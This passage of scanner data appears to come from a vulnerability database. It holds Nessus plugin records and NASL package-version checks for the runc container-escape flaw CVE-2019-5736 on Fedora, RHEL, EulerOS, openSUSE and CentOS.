preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"runc-1.0.0-92.dev.gitc1b8c57.fc29\", epoch:\"2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:runc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-11T13:42:15", "description": "An update is now available for Red Hat OpenShift Container Platform\n3.4, 3.5, 3.6, and 3.7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or\nprivate cloud deployments.\n\nSecurity Fix(es) :\n\n* A flaw was found in the way runc handled system file descriptors\nwhen running containers. A malicious container could use this flaw to\noverwrite contents of the runc binary and consequently run arbitrary\ncommands on the container host system. 
(CVE-2019-5736)\n\nAll OpenShift Container Platform 3 users are advised to upgrade to\nthese updated packages.\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "edition": 17, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-02-26T00:00:00", "title": "RHEL 7 : OpenShift Container Platform 3.4, 3.5, 3.6, and 3.7 (RHSA-2019:0408)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-26T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:docker", "p-cpe:/a:redhat:enterprise_linux:docker-lvm-plugin", "p-cpe:/a:redhat:enterprise_linux:docker-debuginfo", "p-cpe:/a:redhat:enterprise_linux:docker-common", "p-cpe:/a:redhat:enterprise_linux:docker-logrotate", "p-cpe:/a:redhat:enterprise_linux:docker-rhel-push-plugin", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:docker-unit-test", "p-cpe:/a:redhat:enterprise_linux:docker-client", "p-cpe:/a:redhat:enterprise_linux:docker-novolume-plugin", "p-cpe:/a:redhat:enterprise_linux:docker-v1.10-migrator"], "id": "REDHAT-RHSA-2019-0408.NASL", "href": "https://www.tenable.com/plugins/nessus/122442", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:0408. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122442);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/10\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_xref(name:\"RHSA\", value:\"2019:0408\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 3.4, 3.5, 3.6, and 3.7 (RHSA-2019:0408)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update is now available for Red Hat OpenShift Container Platform\n3.4, 3.5, 3.6, and 3.7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or\nprivate cloud deployments.\n\nSecurity Fix(es) :\n\n* A flaw was found in the way runc handled system file descriptors\nwhen running containers. A malicious container could use this flaw to\noverwrite contents of the runc binary and consequently run arbitrary\ncommands on the container host system. 
(CVE-2019-5736)\n\nAll OpenShift Container Platform 3 users are advised to upgrade to\nthese updated packages.\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:0408\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-5736\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-logrotate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-lvm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-novolume-plugin\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:docker-rhel-push-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-unit-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-v1.10-migrator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:0408\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-client-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-common-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-debuginfo-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-logrotate-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-lvm-plugin-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-novolume-plugin-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-rhel-push-plugin-1.12.6-79.git5680db5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-unit-test-1.12.6-79.git5680db5.el7\")) 
flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"docker-v1.10-migrator-1.12.6-79.git5680db5.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"docker / docker-client / docker-common / docker-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-11T08:54:59", "description": "According to the version of the docker-engine package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - A flaw was found in the way runc handled system file\n descriptors when running containers. A malicious\n container could use this flaw to overwrite contents of\n the runc binary and consequently run arbitrary commands\n on the container host system. (CVE-2019-5736)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-03-08T00:00:00", "title": "EulerOS 2.0 SP5 : docker-engine (EulerOS-SA-2019-1074)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2019-03-08T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:docker-engine", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-1074.NASL", "href": "https://www.tenable.com/plugins/nessus/122697", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(122697);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/10\");\n\n script_cve_id(\n \"CVE-2019-5736\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : docker-engine (EulerOS-SA-2019-1074)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the docker-engine package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - A flaw was found in the way runc handled system file\n descriptors when running containers. A malicious\n container could use this flaw to overwrite contents of\n the runc binary and consequently run arbitrary commands\n on the container host system. (CVE-2019-5736)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1074\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aaf104d5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected docker-engine package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:docker-engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"docker-engine-1.11.2.109-0.0.20190219.220020.git66790c0.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"docker-engine\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:45:01", "description": "This update for docker-runc fixes the following issues 
:\n\nSecurity issue fixed :\n\n - CVE-2019-5736: Effectively copying /proc/self/exe during\n re-exec to avoid write attacks to the host runc binary,\n which could lead to a container breakout (bsc#1121967)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "edition": 17, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-02-19T00:00:00", "title": "openSUSE Security Update : docker-runc (openSUSE-2019-201)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:docker-runc-debugsource", "p-cpe:/a:novell:opensuse:docker-runc-debuginfo", "p-cpe:/a:novell:opensuse:docker-runc-kubic-debuginfo", "p-cpe:/a:novell:opensuse:docker-runc-kubic", "p-cpe:/a:novell:opensuse:docker-runc-test", "p-cpe:/a:novell:opensuse:docker-runc-kubic-test", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:docker-runc", "p-cpe:/a:novell:opensuse:docker-runc-kubic-debugsource"], "id": "OPENSUSE-2019-201.NASL", "href": "https://www.tenable.com/plugins/nessus/122301", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-201.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(122301);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2019-5736\");\n\n script_name(english:\"openSUSE Security Update : docker-runc (openSUSE-2019-201)\");\n script_summary(english:\"Check for the openSUSE-2019-201 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This 
update for docker-runc fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2019-5736: Effectively copying /proc/self/exe during\n re-exec to avoid write attacks to the host runc binary,\n which could lead to a container breakout (bsc#1121967)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121967\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected docker-runc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc-kubic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc-kubic-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc-kubic-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc-kubic-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"docker-runc-1.0.0rc5+gitr3562_69663f0bd4b6-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"docker-runc-debuginfo-1.0.0rc5+gitr3562_69663f0bd4b6-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"docker-runc-debugsource-1.0.0rc5+gitr3562_69663f0bd4b6-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"docker-runc-kubic-1.0.0rc5+gitr3562_69663f0bd4b6-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", 
reference:\"docker-runc-kubic-debuginfo-1.0.0rc5+gitr3562_69663f0bd4b6-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"docker-runc-kubic-debugsource-1.0.0rc5+gitr3562_69663f0bd4b6-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"docker-runc-kubic-test-1.0.0rc5+gitr3562_69663f0bd4b6-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"docker-runc-test-1.0.0rc5+gitr3562_69663f0bd4b6-8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"docker-runc / docker-runc-debuginfo / docker-runc-debugsource / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T01:23:29", "description": "The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nCESA-2019:0975 advisory.\n\n - runc: Execution of malicious containers allows for container escape and access to host filesystem\n (CVE-2019-5736)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2021-01-29T00:00:00", "title": "CentOS 8 : container-tools:rhel8 (CESA-2019:0975)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2021-01-29T00:00:00", "cpe": ["p-cpe:/a:centos:centos:container-selinux", "p-cpe:/a:centos:centos:oci-umount", "p-cpe:/a:centos:centos:buildah", "p-cpe:/a:centos:centos:containers-common", "p-cpe:/a:centos:centos:podman-docker", "p-cpe:/a:centos:centos:skopeo", "cpe:/o:centos:centos:8", "p-cpe:/a:centos:centos:oci-systemd-hook", "p-cpe:/a:centos:centos:containernetworking-plugins", 
"p-cpe:/a:centos:centos:fuse-overlayfs", "p-cpe:/a:centos:centos:slirp4netns", "p-cpe:/a:centos:centos:podman", "p-cpe:/a:centos:centos:runc", "cpe:/a:centos:centos:8::appstream"], "id": "CENTOS8_RHSA-2019-0975.NASL", "href": "https://www.tenable.com/plugins/nessus/145642", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2019:0975. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145642);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/02\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_bugtraq_id(106976);\n script_xref(name:\"RHSA\", value:\"2019:0975\");\n\n script_name(english:\"CentOS 8 : container-tools:rhel8 (CESA-2019:0975)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nCESA-2019:0975 advisory.\n\n - runc: Execution of malicious containers allows for container escape and access to host filesystem\n (CVE-2019-5736)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:0975\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5736\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:buildah\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:container-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:containernetworking-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:containers-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:fuse-overlayfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:oci-systemd-hook\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:oci-umount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:podman\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:podman-docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:runc\");\n script_set_attribute(attribute:\"cpe\", 